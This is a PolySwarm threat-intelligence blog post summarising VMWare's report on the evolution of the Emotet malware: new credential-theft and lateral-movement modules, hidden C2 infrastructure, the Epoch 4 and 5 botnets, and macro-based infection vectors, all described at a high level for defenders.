The PolySwarm Blog

Analyze suspicious files and URLs, at scale, millions of times per day. Get real-time threat intel from a crowdsourced network of security experts and antivirus companies competing to protect you.

Emotet Observed Using New TTPs

Oct 20, 2022 11:06:46 AM / by PolySwarm Tech Team


Related Families: TrickBot, Ryuk, QakBot, Zloader, Quantum, BlackCat

Verticals Targeted: Financial, Various

Executive Summary

VMWare recently reported on the evolution of Emotet. New Emotet TTPs include added functionality, new anti-analysis techniques, infrastructure changes, and new attack vectors.

Key Takeaways

  • Emotet has evolved TTPs since its return in late 2021.
  • Emotet was originally a banking trojan but now also acts as a botnet and a loader.
  • Other changes to Emotet include new functionalities, new anti-analysis techniques, infrastructure changes, and new attack vectors.
What is Emotet?

The Emotet banking trojan, first seen in the wild in 2014, was once considered the “world’s most dangerous malware.” Previous versions of Emotet were extremely dangerous because they spread quickly, were difficult to detect, and were sometimes used by other threat actor groups to install ransomware, stealers, and other malware.  The threat actors behind Emotet created an elaborate infrastructure, the notorious Emotet malware botnet.

Emotet was considered dead after its takedown by law enforcement groups in January 2021. Although leftover samples existed in the wild, there was no network infrastructure to support them. In November 2021, Emotet activity was again observed in the wild. Emotet now primarily functions as a botnet and a loader as a service (LaaS). Last month, industry researchers reported that ransomware as a service (RaaS) groups, including Quantum and BlackCat, are leveraging Emotet.

How Has Emotet Evolved?

VMWare reported multiple changes indicating the evolution of Emotet’s TTPs:

Functionality Added

Emotet has new models allowing threat actors to steal credit card information from the Google Chrome browser and to leverage SMB to spread laterally.

Anti Analysis

The threat actors behind Emotet are hiding their C2 infrastructure, making analysis more difficult. More recent Emotet variants use a new method of storing the configuration data within the binary.

Infrastructure Changes

VMWare noted a shift in Emotet’s infrastructure, with the current versions using clusters known as Epoch 4 and Epoch 5. VMWare researchers examined 23,811 DLL payloads and discovered 328 unique IP addresses used by Emotet. The majority belonged to Epoch 4, with just under 40% belonging to Epoch 5. One IP address overlapped both botnets. Emotet’s C2 infrastructure creates redundancy and makes activity harder to track. The ports most commonly used by Emotet include 8080 and 443.

New Attack Vectors

VMWare noted Emotet has been leveraging both malicious URLs embedded in emails and malicious Microsoft documents as an initial infection vector. Some attacks relied on Excel documents containing macros. The macros function to download the next stage payload, use rundll32.exe to execute the payload and gain registry persistence. Infections observed earlier this year used mshta.exe as an infection vector. This legitimate utility is used for LoLBins (living off the land binaries) techniques and executes Microsoft HTA files.


PolySwarm has multiple samples associated with new Emotet activity.





















You can use the following CLI command to search for all Emotet samples in our portal:

$ polyswarm link list -f Emotet

Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.

Contact us at | Check out our blog | Subscribe to our reports

Topics: Threat Bulletin, Banking, Loader, Trojan, Botnet, Emotet

PolySwarm Tech Team

Written by PolySwarm Tech Team

Subscribe to Email Updates

Lists by Topic

see all

Posts by Topic

See all

Recent Posts